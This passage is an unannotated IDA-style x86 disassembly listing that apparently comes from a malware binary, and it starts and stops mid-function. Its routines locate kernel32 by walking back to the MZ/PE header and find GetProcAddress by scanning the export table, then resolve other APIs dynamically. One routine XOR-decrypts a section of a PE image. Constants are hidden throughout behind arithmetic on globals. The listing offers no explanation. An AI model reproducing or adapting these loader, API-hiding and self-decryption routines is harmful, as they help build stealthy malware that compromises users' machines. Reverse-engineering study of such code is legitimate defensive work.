movsx esi, word ptr ds:100120F0h
mov edi, ds:100120B0h
lea esi, [esi+edi+14h]
imul ebx, esi
mov esi, ds:10012098h
add esi, 13h
imul ebx, esi
movsx esi, word ptr ds:100120B4h
add esi, 37h
imul ebx, esi
add ecx, ebx
movzx ebx, [ebp+var_10]
mov esi, ds:10012104h
lea eax, [eax+esi+8]
imul ebx, eax
movsx eax, word ptr ds:10012114h
lea eax, [edx+eax+16h]
mov edx, ebx
imul edx, eax
mov eax, ds:1001210Ch
add eax, 15h
imul edx, eax
mov eax, ds:100120C0h
add eax, 39h
add eax, ds:100120D0h
imul edx, eax
mov eax, ecx
add eax, edx
mov ds:1000C024h, eax
mov eax, ds:10012094h
add eax, ds:10012098h
sub eax, 4
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_421291
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_41CE86 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov edi, [ebp+0Ch]
mov eax, [ebp+18h]
mov [ebp+18h], ax
mov eax, ds:10012110h
add eax, 0F2h
cmp edi, eax
jnz short loc_41CFDE
push dword ptr [ebp+1Ch]
call sub_41A910
pop ecx
xor eax, eax
jmp short loc_41D000
; ---------------------------------------------------------------------------
loc_41CFDE: ; CODE XREF: .data:0041CFCF�j
movsx eax, word ptr ds:100120CCh
add eax, 0FCh
cmp edi, eax
jnz short loc_41CFFB
push dword ptr [ebp+1Ch]
call sub_41FE14
pop ecx
xor eax, eax
jmp short loc_41D000
; ---------------------------------------------------------------------------
loc_41CFFB: ; CODE XREF: .data:0041CFEC�j
mov eax, 80020003h
loc_41D000: ; CODE XREF: .data:0041CFDC�j
; .data:0041CFF9�j
pop edi
pop ebp
retn 24h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+8]
mov ebx, [ebp+0Ch]
mov eax, ebx
cmp eax, 100h
jz short loc_41D036
jl loc_41D596
cmp eax, 111h
jz loc_41D0CE
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D036: ; CODE XREF: .data:0041D01E�j
cmp dword ptr [ebp+10h], 9
jnz loc_41D596
mov edi, ds:100120BCh
dec edi
jmp short loc_41D0B4
; ---------------------------------------------------------------------------
loc_41D049: ; CODE XREF: .data:0041D0C7�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
cmp ds:1000F380h[eax], esi
jnz short loc_41D07E
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000EA40h
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D07E: ; CODE XREF: .data:0041D05D�j
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
cmp ds:1000F384h[eax], esi
jnz short loc_41D0B3
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000EA40h
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D0B3: ; CODE XREF: .data:0041D092�j
inc edi
loc_41D0B4: ; CODE XREF: .data:0041D047�j
movsx eax, word ptr ds:100120A4h
mov edx, ds:10012124h
lea eax, [eax+edx+5Dh]
cmp edi, eax
jb short loc_41D049
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D0CE: ; CODE XREF: .data:0041D02B�j
movsx eax, word ptr ds:10012108h
movsx edx, word ptr ds:100120E4h
mov edi, eax
add edi, edx
sub edi, 0Bh
jmp short loc_41D0FF
; ---------------------------------------------------------------------------
loc_41D0E5: ; CODE XREF: .data:0041D109�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
mov eax, ds:1000F38Ch[eax]
cmp [ebp+14h], eax
jz short loc_41D10B
inc edi
loc_41D0FF: ; CODE XREF: .data:0041D0E3�j
mov eax, ds:100120FCh
add eax, 61h
cmp edi, eax
jb short loc_41D0E5
loc_41D10B: ; CODE XREF: .data:0041D0FC�j
movsx eax, word ptr ds:100120A0h
add eax, 5Fh
cmp edi, eax
jz loc_41D596
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:1000F378h[eax]
call dword ptr ds:10011BA4h
mov eax, ds:100120BCh
movsx edx, word ptr ds:10012108h
add eax, edx
mov byte ptr [ebp+eax-20Ah], 4Bh
mov eax, ds:1001210Ch
add eax, ds:100120B0h
mov edx, ds:10012124h
sub edx, 2
mov [ebp+eax-20Bh], dl
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
add esp, 8
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:10011BA4h
movsx eax, word ptr ds:100120CCh
add eax, ds:100120B0h
movsx eax, byte ptr [ebp+eax-10Fh]
mov edx, ds:10012124h
sub edx, 2
cmp eax, edx
jnz short loc_41D213
mov eax, ds:10012100h
movsx edx, word ptr ds:100120E4h
add eax, edx
sub eax, 9
push eax
push 0
push 10013698h
push 0
call dword ptr ds:10011640h
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000EA40h
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D213: ; CODE XREF: .data:0041D1D1�j
push 10013693h
call sub_41E33D
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000C020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:10011BA4h
mov eax, ds:10012104h
movsx eax, byte ptr [ebp+eax-105h]
movsx edx, word ptr ds:10012140h
movsx ecx, word ptr ds:100120E0h
add edx, ecx
sub edx, 0Fh
cmp eax, edx
jnz short loc_41D2C4
mov eax, ds:100120D0h
mov edx, eax
add edx, eax
push edx
push 0
push 10013674h
push 0
call dword ptr ds:10011640h
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000EA40h
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D2C4: ; CODE XREF: .data:0041D28A�j
push 1001366Fh
call sub_41E33D
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000C020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:10011BA4h
mov eax, ds:10012148h
add eax, ds:10012144h
movsx eax, byte ptr [ebp+eax-105h]
mov edx, ds:100120C4h
movsx ecx, word ptr ds:100120B8h
add edx, ecx
sub edx, 6
cmp eax, edx
jz loc_41D478
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41D34F: ; CODE XREF: .data:0041D354�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D34F
mov edx, eax
mov ecx, ds:100120D8h
movsx eax, word ptr ds:1001213Ch
add ecx, eax
sub ecx, 6
cmp edx, ecx
jb loc_41D478
mov eax, ds:10012104h
add eax, ds:1001210Ch
sub eax, 5
mov [ebp-105h], al
jmp short loc_41D3AA
; ---------------------------------------------------------------------------
loc_41D388: ; CODE XREF: .data:0041D3C3�j
movzx eax, byte ptr [ebp-105h]
mov al, [ebp+eax-103h]
cmp al, 30h
jl short loc_41D39E
cmp al, 39h
jle short loc_41D3A3
loc_41D39E: ; CODE XREF: .data:0041D398�j
jmp loc_41D478
; ---------------------------------------------------------------------------
loc_41D3A3: ; CODE XREF: .data:0041D39C�j
add byte ptr [ebp-105h], 1
loc_41D3AA: ; CODE XREF: .data:0041D386�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41D3B3: ; CODE XREF: .data:0041D3B8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D3B3
movzx ecx, byte ptr [ebp-105h]
cmp ecx, eax
jb short loc_41D388
movsx eax, word ptr ds:1001211Ch
sub eax, 2
mov [ebp-104h], al
jmp short loc_41D454
; ---------------------------------------------------------------------------
loc_41D3D7: ; CODE XREF: .data:0041D46D�j
mov al, [ebp-104h]
mov [ebp-219h], al
jmp short loc_41D40E
; ---------------------------------------------------------------------------
loc_41D3E5: ; CODE XREF: .data:0041D427�j
movzx eax, byte ptr [ebp-219h]
movsx eax, byte ptr [ebp+eax-103h]
movzx edx, byte ptr [ebp-104h]
movsx edx, byte ptr [ebp+edx-103h]
cmp eax, edx
jnz short loc_41D429
add byte ptr [ebp-219h], 1
loc_41D40E: ; CODE XREF: .data:0041D3E3�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41D417: ; CODE XREF: .data:0041D41C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D417
movzx ecx, byte ptr [ebp-219h]
cmp ecx, eax
jb short loc_41D3E5
loc_41D429: ; CODE XREF: .data:0041D405�j
movzx eax, byte ptr [ebp-219h]
movzx edx, byte ptr [ebp-104h]
sub eax, edx
movsx edx, word ptr ds:10012120h
add edx, ds:100120D0h
sub edx, 5
cmp eax, edx
jg short loc_41D478
add byte ptr [ebp-104h], 1
loc_41D454: ; CODE XREF: .data:0041D3D5�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41D45D: ; CODE XREF: .data:0041D462�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D45D
movzx ecx, byte ptr [ebp-104h]
cmp ecx, eax
jb loc_41D3D7
jmp loc_41D50F
; ---------------------------------------------------------------------------
loc_41D478: ; CODE XREF: .data:0041D340�j
; .data:0041D36C�j ...
mov eax, ds:100120B0h
lea eax, [eax+eax+7C6h]
push eax
call dword ptr ds:10011630h
push 10013636h
call sub_41E33D
mov [ebp-21Ch], eax
push 1001361Fh
call sub_41E33D
movsx edx, word ptr ds:100120B8h
add edx, ds:100120E8h
sub edx, 8
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call dword ptr ds:10011640h
push 1001361Bh
call sub_41E33D
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp-220h], eax
mov edx, eax
push dword ptr ds:1000F388h[edx]
call dword ptr ds:10011654h
mov eax, 30h
mul edi
mov [ebp-224h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000EA40h
jmp loc_41D596
; ---------------------------------------------------------------------------
loc_41D50F: ; CODE XREF: .data:0041D473�j
push 10013616h
call sub_41E33D
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000C020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
mov eax, 30h
mul edi
mov [ebp-228h], eax
push dword ptr ds:1000F378h[eax]
call dword ptr ds:1000F224h
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C04Ch
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp-22Ch], eax
push dword ptr ds:1000F374h[eax]
call dword ptr ds:10011658h
mov eax, 30h
mul edi
mov [ebp-230h], eax
and dword ptr ds:1000F370h[eax], 0
loc_41D596: ; CODE XREF: .data:0041D020�j
; .data:0041D031�j ...
movsx eax, word ptr ds:10012130h
mov edi, eax
add edi, ds:100120B0h
sub edi, 9
jmp loc_41D681
; ---------------------------------------------------------------------------
loc_41D5AD: ; CODE XREF: .data:0041D68B�j
mov eax, 30h
mul edi
mov [ebp-8], eax
cmp esi, ds:1000F380h[eax]
jnz short loc_41D5E4
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-0Ch], eax
push dword ptr ds:1000F390h[eax]
call dword ptr ds:1001160Ch
jmp loc_41D691
; ---------------------------------------------------------------------------
loc_41D5E4: ; CODE XREF: .data:0041D5BE�j
mov eax, 30h
mul edi
mov [ebp-10h], eax
cmp esi, ds:1000F384h[eax]
jnz short loc_41D618
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-14h], eax
push dword ptr ds:1000F394h[eax]
call dword ptr ds:1001160Ch
jmp short loc_41D691
; ---------------------------------------------------------------------------
loc_41D618: ; CODE XREF: .data:0041D5F5�j
mov eax, 30h
mul edi
mov [ebp-18h], eax
cmp esi, ds:1000F388h[eax]
jnz short loc_41D64C
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-1Ch], eax
push dword ptr ds:1000F398h[eax]
call dword ptr ds:1001160Ch
jmp short loc_41D691
; ---------------------------------------------------------------------------
loc_41D64C: ; CODE XREF: .data:0041D629�j
mov eax, 30h
mul edi
mov [ebp-20h], eax
cmp esi, ds:1000F37Ch[eax]
jnz short loc_41D680
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-24h], eax
push dword ptr ds:1000F39Ch[eax]
call dword ptr ds:1001160Ch
jmp short loc_41D691
; ---------------------------------------------------------------------------
loc_41D680: ; CODE XREF: .data:0041D65D�j
inc edi
loc_41D681: ; CODE XREF: .data:0041D5A8�j
mov eax, ds:100120A8h
add eax, 60h
cmp edi, eax
jb loc_41D5AD
loc_41D691: ; CODE XREF: .data:0041D5DF�j
; .data:0041D616�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D699 proc near ; CODE XREF: .data:0041F923�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, ds:100120B0h
add edx, 1FBh
add edx, ds:10012094h
mov ebx, eax
imul ebx, edx
mov eax, ds:10012124h
mov ecx, eax
add ecx, ds:100120BCh
dec ecx
jmp short loc_41D6F5
; ---------------------------------------------------------------------------
loc_41D6E7: ; CODE XREF: sub_41D699+5E�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_41D6F5: ; CODE XREF: sub_41D699+4C�j
cmp ecx, ebx
jb short loc_41D6E7
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_41D699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D704 proc near ; CODE XREF: sub_4242AF+1A4�p
; sub_4242AF+1C5�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call dword ptr ds:10011770h
mov [ebp+var_8], eax
mov esi, ds:100120E8h
sub esi, 6
jmp short loc_41D764
; ---------------------------------------------------------------------------
loc_41D724: ; CODE XREF: sub_41D704+6C�j
cmp dword ptr ds:1000D130h[esi*4], 0
jz short loc_41D763
mov edx, ds:10010660h[esi*4]
movsx ecx, word ptr ds:100120A4h
movsx eax, word ptr ds:1001211Ch
lea ecx, [ecx+eax+0EA59h]
movsx eax, word ptr ds:100120B4h
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_41D763
and dword ptr ds:1000D130h[esi*4], 0
loc_41D763: ; CODE XREF: sub_41D704+28�j
; sub_41D704+55�j
inc esi
loc_41D764: ; CODE XREF: sub_41D704+1E�j
mov eax, ds:10012094h
add eax, 3E8h
cmp esi, eax
jb short loc_41D724
loc_41D772: ; CODE XREF: sub_41D704+9A�j
; sub_41D704+25B�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_41D965
movsx eax, word ptr ds:10012130h
movsx edx, word ptr ds:10012120h
add eax, edx
sub eax, 8
cmp [ebp+var_14], eax
ja short loc_41D772
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_41D7A5: ; CODE XREF: sub_41D704+A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D7A5
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
mov edx, ds:10012110h
sub edx, 4
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
mov eax, ds:100120C4h
add eax, ds:1001209Ch
sub eax, 7
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_41D7DE
mov [ebp+var_1], 43h
loc_41D7DE: ; CODE XREF: sub_41D704+D4�j
mov edi, ds:100120ACh
sub edi, 2
jmp short loc_41D810
; ---------------------------------------------------------------------------
loc_41D7E9: ; CODE XREF: sub_41D704+118�j
cmp dword ptr ds:1000D130h[edi*4], 0
jz short loc_41D80F
mov edx, [ebp+var_C]
cmp ds:1000C060h[edi*4], edx
jnz short loc_41D80F
mov dl, ds:1000E200h[edi]
cmp dl, [ebp+var_1]
jz loc_41D942
loc_41D80F: ; CODE XREF: sub_41D704+ED�j
; sub_41D704+F9�j
inc edi
loc_41D810: ; CODE XREF: sub_41D704+E3�j
mov eax, ds:100120E8h
add eax, 3E2h
cmp edi, eax
jb short loc_41D7E9
mov eax, ds:10012110h
add eax, 3B6h
add eax, ds:10012148h
cmp [ebp+var_10], eax
jbe loc_41D8F0
mov eax, ds:100120D4h
add eax, 0Fh
push eax
lea eax, [ebp+var_4F]
push eax
call sub_424172
add esp, 8
mov eax, ds:100120D8h
add eax, 3BDh
mov [ebp+var_18], eax
mov eax, ds:10012124h
sub eax, 2
mov [ebp+var_1C], eax
loc_41D864: ; CODE XREF: sub_41D704+1E7�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
movsx edx, word ptr ds:1001211Ch
movsx ecx, word ptr ds:100120E4h
add edx, ecx
sub edx, 8
mov [ebx+eax], dl
push 1000D020h
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx eax, word ptr ds:1001214Ch
add eax, ds:10012094h
sub eax, 4
and eax, 0FFh
push eax
call sub_4206FE
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, ds:100120E8h
add eax, 3BAh
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_41D8E3
mov [ebp+var_18], eax
loc_41D8E3: ; CODE XREF: sub_41D704+1DA�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_41D93D
jmp loc_41D864
; ---------------------------------------------------------------------------
loc_41D8F0: ; CODE XREF: sub_41D704+12D�j
push 10013611h
call sub_41E33D
push 1000D020h
push [ebp+var_10]
mov edx, ds:10012148h
add edx, ds:100120D0h
sub edx, 2
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov edx, ds:10012104h
mov ecx, edx
add ecx, edx
mov edx, ecx
sub edx, 4
and edx, 0FFh
push edx
call sub_4206FE
add esp, 28h
loc_41D93D: ; CODE XREF: sub_41D704+1E5�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_41D942: ; CODE XREF: sub_41D704+105�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
movsx edx, word ptr ds:10012090h
mov ecx, ds:100120BCh
lea edx, [edx+ecx+11h]
cmp [eax], edx
jbe loc_41D772
loc_41D965: ; CODE XREF: sub_41D704+7E�j
push 1001360Dh
call sub_41E33D
push 1000D020h
movsx edx, word ptr ds:100120CCh
sub edx, 7
push edx
push dword ptr ds:10012128h
push eax
movsx edx, word ptr ds:10012120h
mov ecx, edx
add ecx, edx
mov edx, ecx
sub edx, 10h
push edx
push 0
push 0
push [ebp+arg_8]
movsx edx, word ptr ds:1001211Ch
add edx, ds:100120BCh
sub edx, 2
and edx, 0FFh
push edx
call sub_4206FE
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_41D704 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D9C2 proc near ; CODE XREF: .data:004202AF�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21F = byte ptr -21Fh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
movsx esi, word ptr ds:1001212Ch
mov ecx, esi
add ecx, 0Ch
shr edi, cl
mov esi, ds:100120D0h
add esi, 0Ch
add esi, ds:100120A8h
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_41D9F4: ; CODE XREF: sub_41D9C2+4D�j
; sub_41D9C2+86�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_41DA11
mov eax, ds:10012124h
add eax, 0FFFEh
sub ebx, eax
jmp short loc_41D9F4
; ---------------------------------------------------------------------------
loc_41DA11: ; CODE XREF: sub_41D9C2+3F�j
mov eax, ds:10012094h
add eax, 3Ch
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_41DA4A
mov eax, ds:10012134h
add eax, 0FFF8h
add eax, ds:100120A8h
sub ebx, eax
jmp short loc_41D9F4
; ---------------------------------------------------------------------------
loc_41DA4A: ; CODE XREF: sub_41D9C2+72�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_41DA70
mov eax, ds:10012144h
lea eax, [eax+eax+10000h]
sub ebx, eax
jmp short loc_41D9F4
; ---------------------------------------------------------------------------
loc_41DA70: ; CODE XREF: sub_41D9C2+9C�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_42509D
mov eax, ds:100120FCh
add eax, ds:100120C4h
sub eax, 7
mov [ebp+var_4], eax
jmp short loc_41DAD2
; ---------------------------------------------------------------------------
loc_41DAB0: ; CODE XREF: sub_41D9C2+126�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_41DACF
cmp al, 7Ah
jge short loc_41DACF
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_41DACF: ; CODE XREF: sub_41D9C2+FA�j
; sub_41D9C2+FE�j
inc [ebp+var_4]
loc_41DAD2: ; CODE XREF: sub_41D9C2+EC�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, ds:100120B0h
sub edx, 5
cmp eax, edx
jnz short loc_41DAB0
cmp [ebp+var_103], 4Bh
jnz short loc_41DB20
cmp [ebp+var_102], 45h
jnz short loc_41DB20
cmp [ebp+var_101], 52h
jnz short loc_41DB20
cmp [ebp+var_FE], 4Ch
jnz short loc_41DB20
cmp [ebp+var_FD], 33h
jnz short loc_41DB20
cmp [ebp+var_FC], 32h
jz short loc_41DB25
loc_41DB20: ; CODE XREF: sub_41D9C2+12F�j
; sub_41D9C2+138�j ...
jmp loc_41DD6E
; ---------------------------------------------------------------------------
loc_41DB25: ; CODE XREF: sub_41D9C2+15C�j
mov eax, ds:100120ACh
add eax, ds:100120A8h
sub eax, 6
mov [ebp+var_108], eax
jmp loc_41DD59
; ---------------------------------------------------------------------------
loc_41DB3E: ; CODE XREF: sub_41D9C2+3A6�j
mov eax, [ebp+var_108]
movsx ecx, word ptr ds:100120E4h
movsx esi, word ptr ds:100120B4h
add ecx, esi
sub ecx, 7
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_42509D
movsx eax, word ptr ds:10012114h
cmp byte ptr [ebp+eax+var_224+2], 47h
jnz loc_41DD53
mov eax, ds:10012128h
add eax, ds:100120FCh
cmp [ebp+eax+var_220], 74h
jnz loc_41DD53
movsx eax, word ptr ds:10012140h
movsx edx, word ptr ds:10012090h
add eax, edx
cmp byte ptr [ebp+eax+var_228+3], 50h
jnz loc_41DD53
mov eax, ds:10012094h
add eax, 2
movsx edx, word ptr ds:1001214Ch
add eax, edx
cmp [ebp+eax+var_21F], 63h
jnz loc_41DD53
movsx eax, word ptr ds:1001213Ch
cmp [ebp+eax+var_21F], 41h
jnz loc_41DD53
mov eax, ds:10012104h
add eax, 2
movsx edx, word ptr ds:100120E4h
add eax, edx
cmp [ebp+eax+var_21F], 72h
jnz loc_41DD53
mov eax, [ebp+var_108]
movsx ecx, word ptr ds:10012108h
add ecx, ds:100120ACh
sub ecx, 5
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
mov ecx, ds:10012100h
add ecx, ds:10012138h
dec ecx
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov ds:10012154h, ebx
mov ds:1000E1F8h, edx
lea edi, [ebp+var_23D]
lea esi, ds:10012688h
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, ds:10012695h
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, ds:100126AAh
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, ds:100126C4h
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011B90h, eax
lea eax, [ebp+var_252]
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1001165Ch, eax
lea eax, [ebp+var_26C]
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000D008h, eax
lea eax, [ebp+var_281]
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1001064Ch, eax
jmp short loc_41DD6E
; ---------------------------------------------------------------------------
loc_41DD53: ; CODE XREF: sub_41D9C2+1D8�j
; sub_41D9C2+1F1�j ...
inc [ebp+var_108]
loc_41DD59: ; CODE XREF: sub_41D9C2+177�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_41DB3E
loc_41DD6E: ; CODE XREF: sub_41D9C2:loc_41DB20�j
; sub_41D9C2+38F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D9C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD73 proc near ; CODE XREF: .data:0041F97B�p
var_209 = byte ptr -209h
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_1FE = byte ptr -1FEh
var_107 = byte ptr -107h
var_102 = byte ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_F8 = byte ptr -0F8h
push ebp
mov ebp, esp
sub esp, 20Ch
push esi
push edi
push 0FFh
lea eax, [ebp+var_1FE]
push eax
call dword ptr ds:1000E5FCh
push 100135FAh
call sub_41E33D
movsx edi, word ptr ds:10012108h
movsx esi, word ptr ds:100120F4h
add edi, esi
sub edi, 4
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push 1000E0F0h
call dword ptr ds:10011634h
push 100135E7h
call sub_41E33D
movsx edi, word ptr ds:1001214Ch
sub edi, 3
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push 1000F260h
call dword ptr ds:10011634h
lea eax, ds:10007C54h
